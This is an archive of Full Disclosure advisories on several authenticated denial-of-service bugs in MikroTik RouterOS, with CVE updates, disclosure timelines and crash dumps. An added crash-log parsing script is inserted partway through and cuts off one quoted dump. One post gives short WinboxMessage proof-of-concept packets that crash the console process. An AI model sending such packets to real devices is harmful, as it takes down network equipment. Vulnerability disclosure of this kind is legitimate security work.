Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-07 Thread Q C
[Update 2021/05/05] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20267: Mikrotik RouterOs before 6.47 (stable tree) suffers from a
memory corruption vulnerability in the /nova/bin/resolver process. An
authenticated remote attacker can cause a Denial of Service due to invalid
memory access.

CVE-2020-20225: Mikrotik RouterOs before 6.47 (stable tree) suffers from an
assertion failure vulnerability in the /nova/bin/user process. An
authenticated remote attacker can cause a Denial of Service due to an
assertion failure via a crafted packet.


Q C wrote on Wed, 9 Sep 2020 at 9:02 PM:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==
>
> 1. memory corruption
> The resolver process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> resolver process due to invalid memory access.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.28@0: /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: --- signal=11
> 
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
> 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018
> ebp=0x7fe5fd08 esp=0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98
> ecx=0x77676f00 edx=0x0005
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: maps:
> 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp  00:0c 995
>  /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc
> e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08
> 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c
> 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: code: 0x80508f6
> 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72
> 04 8b
>
> This vulnerability was initially found in long-term 6.44.6, and was fixed
> in stable 6.47.
>
> 2. reachable assertion failure
> The user process suffers from an assertion failure vulnerability. There is
> a reachable assertion in the user process. By sending a crafted packet, an
> authenticated remote user can crash the user process due to assertion
> failure.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: /nova/bin/user
> 2020.06.04-17:56:52.31@0: --- signal=6
> 
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
> 2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200
> ebp=0x7fee3790 esp=0x7fee3788
> 2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4
> ecx=0x00b4 edx=0x0006
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: maps:
> 2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp  00:0c 1002
>   /nova/bin/user
> 2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp  00:0c 947
>  /lib/libucrypto.so
> 2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp  00:0c 951
>  /lib/liburadius.so
> 2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp  
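Triage of the /rw/logs/backtrace.log dumps quoted in this thread, as an added example (not part of the original advisory and not MikroTik's or the reporter's tooling): a small Python script that re-joins the lines wrapped by the mail client, extracts the process, signal, registers and executable maps, and resolves eip to the mapping it falls in. The two embedded dumps are constructed abbreviations of the resolver and user dumps above; the rule that signal 6 with eip inside libc points at abort() after a failed assert, and signal 11 with eip inside the main binary at an invalid memory access in the process's own code, is this script's heuristic, not a statement from the advisory.

```python
import re

# Constructed samples in the format of the backtrace.log dumps quoted in this
# thread (abbreviated; the line wrapping a mail client introduces is kept on
# purpose so the parser has to re-join continuation lines).
RESOLVER_DUMP = """\
2020.06.18-14:38:03.27@0:
2020.06.18-14:38:03.28@0: /nova/bin/resolver
2020.06.18-14:38:03.28@0: --- signal=11
2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018
ebp=0x7fe5fd08 esp=0x7fe5fcc0
2020.06.18-14:38:03.28@0: maps:
2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp  00:0c 995
 /nova/bin/resolver
2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp  00:0c 964
 /lib/libuClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
"""

USER_DUMP = """\
2020.06.04-17:56:52.31@0: /nova/bin/user
2020.06.04-17:56:52.31@0: --- signal=6
2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200
ebp=0x7fee3790 esp=0x7fee3788
2020.06.04-17:56:52.31@0: maps:
2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp  00:0c 1002
   /nova/bin/user
2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0: stack: 0x7fee4000 - 0x7fee3788
"""

PREFIX_RE = re.compile(r"^\d{4}\.\d{2}\.\d{2}-\d{2}:\d{2}:\d{2}\.\d{2}@\d+:\s?")
SIGNAL_RE = re.compile(r"---\s*signal=(\d+)")
REG_RE = re.compile(r"\b(e[a-z]+)=0x([0-9a-f]+)")
MAP_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+([rwxps-]{4}).*\s(/\S+)$")
SIGNAL_NAMES = {6: "SIGABRT", 11: "SIGSEGV"}


def unwrap(text):
    """Strip the timestamp prefix and re-join continuation lines that lack one."""
    records = []
    for raw in text.splitlines():
        line = raw.rstrip()
        if PREFIX_RE.match(line):
            records.append(PREFIX_RE.sub("", line).strip())
        elif line.strip() and records:
            records[-1] += " " + line.strip()
    return records


def parse_dump(text):
    """Pull process path, signal number, registers and executable maps out of one dump."""
    info = {"process": None, "signal": None, "regs": {}, "maps": []}
    in_maps = False
    for rec in unwrap(text):
        if not rec:
            continue
        sig = SIGNAL_RE.search(rec)
        if info["process"] is None and rec.startswith("/"):
            info["process"] = rec
        elif sig:
            info["signal"] = int(sig.group(1))
        elif rec == "maps:":
            in_maps = True
        elif rec.startswith(("stack:", "code:")):
            in_maps = False
        elif in_maps:
            m = MAP_RE.match(rec)
            if m:
                info["maps"].append(
                    (int(m.group(1), 16), int(m.group(2), 16), m.group(3), m.group(4)))
        else:
            for name, value in REG_RE.findall(rec):
                info["regs"][name] = int(value, 16)
    return info


def locate(maps, addr):
    """Return (path, offset) of the mapping containing addr, or (None, None)."""
    for lo, hi, _perms, path in maps:
        if lo <= addr < hi:
            return path, addr - lo
    return None, None


def triage(text):
    """Summarise one dump: which module eip was in and what kind of fault it looks like."""
    info = parse_dump(text)
    eip = info["regs"].get("eip")
    module, offset = locate(info["maps"], eip) if eip is not None else (None, None)
    sig = info["signal"]
    # Heuristic classification (assumption of this script, not the advisory's):
    if sig == 6 and module and module != info["process"]:
        verdict = "SIGABRT with eip in a library: consistent with abort() after a failed assert"
    elif sig == 11 and module == info["process"]:
        verdict = "SIGSEGV in the process's own code: invalid memory access"
    else:
        verdict = "unclassified; inspect registers and code bytes by hand"
    return {"process": info["process"], "signal": sig,
            "signal_name": SIGNAL_NAMES.get(sig, "?"), "eip": eip,
            "module": module, "offset": offset, "verdict": verdict}


if __name__ == "__main__":
    for dump in (RESOLVER_DUMP, USER_DUMP):
        r = triage(dump)
        where = f"{r['module']}+0x{r['offset']:x}" if r["module"] else "unmapped"
        print(f"{r['process']} {r['signal_name']} eip=0x{r['eip']:08x} -> {where}: {r['verdict']}")
```

The module-relative offset is what you would hand to a disassembler of the matching RouterOS package; the module-level verdict alone is enough to sort a batch of crash logs from several devices into "assertion" and "memory access" buckets before anyone opens a debugger.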

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-04 Thread Q C
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20219: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/igmp-proxy process. An
authenticated remote attacker can cause a Denial of Service (NULL pointer
dereference).

CVE-2020-20262: Mikrotik RouterOs before 6.47 (stable tree) suffers from an
assertion failure vulnerability in the /ram/pckg/security/nova/bin/ipsec
process. An authenticated remote attacker can cause a Denial of Service due
to an assertion failure via a crafted packet.



Q C wrote on Thu, 13 Aug 2020 at 7:14 PM:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==
>
> 1. NULL pointer dereference
> The igmpproxy process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> igmpproxy process due to NULL pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy
> 2020.06.04-17:44:27.12@0: --- signal=11
> 
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206
> 2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8
> ebp=0x7fa932a8 esp=0x7fa9326c
> 2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x
> ecx=0x000b edx=0x
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: maps:
> 2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp  00:13 16
>   /ram/pckg/multicast/nova/bin/igmpproxy
> 2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c
> 2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32
> a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f
> 2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32
> a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: code: 0x8050a8d
> 2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4
> 0c 0f
>
> This vulnerability was initially found in long-term 6.44.6, and was fixed
> in stable 6.47.
>
> 2. reachable assertion failure
> The ipsec process suffers from an assertion failure vulnerability. There
> is a reachable assertion in the ipsec process. By sending a crafted packet,
> an authenticated remote user can crash the ipsec process due to assertion
> failure.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec
> 2020.06.04-18:25:16.04@0: --- signal=6
> 
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246
> 2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200
> ebp=0x7f8fa450 esp=0x7f8fa448
> 2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291
> ecx=0x0291 edx=0x0006
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: maps:
> 2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp  00:11 42
>   /ram/pckg/security/nova/bin/ipsec
> 2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp  00:0c 959
>  /lib/libdl-0.9.33.2.so
> 2020.06.04-18:25:16.04@0: 774bb000-774d r-xp  00:1f 15
>   /ram/pckg/dhcp/lib/libudhcp.so
> 2020.06.04-18:25:16.04@0: 

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-04 Thread Q C
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20221: Mikrotik RouterOs before 6.44.6 (long-term tree) suffers
from an uncontrolled resource consumption vulnerability in the
/nova/bin/cerm process. An authenticated remote attacker can cause a Denial
of Service due to overloading the system's CPU.

CVE-2020-20218: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/traceroute process. An
authenticated remote attacker can cause a Denial of Service via the
loop counter variable.



Q C wrote on Sun, 10 May 2020 at 10:41 AM:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: until stable 6.45.7 (first vulnerability), until stable
> 6.46.4 (second vulnerability)
> Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second
> vulnerability)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==
>
> These two vulnerabilities were tested only against the MikroTik RouterOS
> stable release tree when found. Maybe other release trees also suffer from
> these vulnerabilities.
>
> 1. The cerm process suffers from an uncontrolled resource consumption
> issue. By sending a crafted packet, an authenticated remote user can cause
> a high cpu load, which may make the device respond slowly or unable to
> respond.
>
> 2. The traceroute process suffers from a memory corruption issue. By
> sending a crafted packet, an authenticated remote user can crash the
> traceroute process due to invalid memory access.
>
>
> Solution
> 
>
> Upgrade to the corresponding latest RouterOS tree version.
>
>
> References
> ==
>
> [1] https://mikrotik.com/download/changelogs/stable-release-tree
>
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-04 Thread Q C
[Update 2021/05/04] CVE-2020-20212 and CVE-2020-20211 have been
assigned to these two vulnerabilities.


CVE-2020-20212: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from
a memory corruption vulnerability in the /nova/bin/console process. An
authenticated remote attacker can cause a Denial of Service (NULL
pointer dereference)


CVE-2020-20211: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from
an assertion failure vulnerability in the /nova/bin/console process.
An authenticated remote attacker can cause a Denial of Service due to
an assertion failure via a crafted packet





Q C wrote on Tue, 14 Apr 2020 at 6:29 PM:

> [Update 2020/04/14] The latest stable release tree 6.46.5 still suffers
> from these two vulnerabilities.
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: through 6.46.5 (stable release tree)
> Fixed Versions: -
> Vendor URL: https://mikrotik.com/
> Vendor Status: not fixed yet
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
> Poc
> ===
> The following pocs are based on the tool routeros (
> https://github.com/tenable/routeros)
>
> 1) memory corruption in console process
>
> WinboxMessage msg;
> msg.set_to(48, 4);
> msg.set_command(0xfe0005);
> msg.add_u32(0xfe000c, -1);
> msg.add_u32(9, 9);
>
> 2) assertion failure in console process
>
> WinboxMessage msg;
> msg.set_to(48, 4);
> msg.set_command(0xfe0005);
> msg.add_u32(0xfe0001, 0);
>
> Disclosure timeline
> ===
> 2019/08/23  reported the 2nd issue to the vendor
> 2019/08/26  reported the 1st issue to the vendor
> 2019/08/28  vendor reproduced the 1st issue and will fix it as soon as
> possible
> 2019/08/30  vendor reproduced the 2nd issue and will fix it as soon as
> possible
> 2019/12/02  notified the vendor the 1st issue still exists in version
> 6.44.6 (2nd issue fixed)
> 2020/01/06  no response from the vendor, and did the initial disclosure
> 2020/04/14  re-tested these two issues against the stable 6.46.5, and
> updated the disclosure
>
>
>
> Q C wrote on Mon, 6 Jan 2020 at 7:32 PM:
>
>> Advisory: two vulnerabilities found in MikroTik's RouterOS
>>
>>
>> Details
>> ===
>>
>> Product: MikroTik's RouterOS
>> Affected Versions: before 6.44.6 (Long-term release tree)
>> Fixed Versions: 6.44.6 (Long-term release tree)
>> Vendor URL: https://mikrotik.com/
>> Vendor Status: fixed version released
>> CVE: -
>> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>>
>>
>> Product Description
>> ==
>>
>> RouterOS is the operating system used on MikroTik's devices, such as
>> switches, routers and access points.
>>
>>
>> Description of vulnerabilities
>> ==
>>
>> These two vulnerabilities were tested only against the MikroTik RouterOS
>> long-term release tree when found. Maybe other release trees also suffer
>> from these issues.
>>
>> 1. The console process suffers from a memory corruption issue.
>> An authenticated remote user can crash the console process due to a NULL
>> pointer reference by sending a crafted packet.
>>
>> 2. The console process suffers from an assertion failure issue. There is
>> a reachable assertion in the console process. An authenticated remote user
>> can crash the console process due to assertion failure by sending a crafted
>> packet.
>>
>> Solution
>> 
>>
>> Upgrade to the corresponding latest RouterOS tree version.
>>
>>
>> References
>> ==
>>
>> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
>>
>


[FD] Two vulnerabilities found in MikroTik's RouterOS

2020-09-11 Thread Q C
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==

1. memory corruption
The resolver process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
resolver process due to invalid memory access.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.18-14:38:03.27@0:
2020.06.18-14:38:03.27@0:
2020.06.18-14:38:03.28@0: /nova/bin/resolver
2020.06.18-14:38:03.28@0: --- signal=11

2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 ebp=0x7fe5fd08
esp=0x7fe5fcc0
2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98 ecx=0x77676f00
edx=0x0005
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: maps:
2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp  00:0c 995
   /nova/bin/resolver
2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc e5
7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08
2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c 00
00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: code: 0x80508f6
2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 04
8b

This vulnerability was initially found in long-term 6.44.6, and was fixed
in stable 6.47.

2. reachable assertion failure
The user process suffers from an assertion failure vulnerability. There is
a reachable assertion in the user process. By sending a crafted packet, an
authenticated remote user can crash the user process due to assertion
failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: /nova/bin/user
2020.06.04-17:56:52.31@0: --- signal=6

2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 ebp=0x7fee3790
esp=0x7fee3788
2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 ecx=0x00b4
edx=0x0006
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: maps:
2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp  00:0c 1002
/nova/bin/user
2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp  00:0c 947
   /lib/libucrypto.so
2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp  00:0c 951
   /lib/liburadius.so
2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp  00:0c 948
   /lib/libuxml++.so
2020.06.04-17:56:52.31@0: 776c2000-7770e000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-17:56:52.31@0: 77714000-7771b000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: stack: 0x7fee4000 - 0x7fee3788
2020.06.04-17:56:52.31@0: 00 20 66 77 00 20 66 77 c8 37 ee 7f 77 60 65
77 06 00 00 00 00 22 66 77 20 00 00 00 00 00 00 00
2020.06.04-17:56:52.31@0: 15 00 00 00 28 38 ee 7f c4 37 ee 7f e4 ea 70
77 01 00 00 00 e4 ea 70 77 15 00 00 00 01 00 fe 00
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: code: 0x7765a55b
2020.06.04-17:56:52.31@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7
d8

This vulnerability was initially found in long-term 6.44.6, and was fixed
in stable 6.47.


Solution

[FD] Two vulnerabilities found in MikroTik's RouterOS

2020-08-14 Thread Q C
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==

1. NULL pointer dereference
The igmpproxy process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
igmpproxy process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: --- signal=11

2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206
2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 ebp=0x7fa932a8
esp=0x7fa9326c
2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x ecx=0x000b
edx=0x
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: maps:
2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp  00:13 16
/ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c
2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 a9
7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f
2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 a9
7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: code: 0x8050a8d
2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 0c
0f

This vulnerability was initially found in long-term 6.44.6, and was fixed
in stable 6.47.

2. reachable assertion failure
The ipsec process suffers from an assertion failure vulnerability. There is
a reachable assertion in the ipsec process. By sending a crafted packet, an
authenticated remote user can crash the ipsec process due to assertion
failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: --- signal=6

2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246
2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200 ebp=0x7f8fa450
esp=0x7f8fa448
2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291 ecx=0x0291
edx=0x0006
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: maps:
2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp  00:11 42
/ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
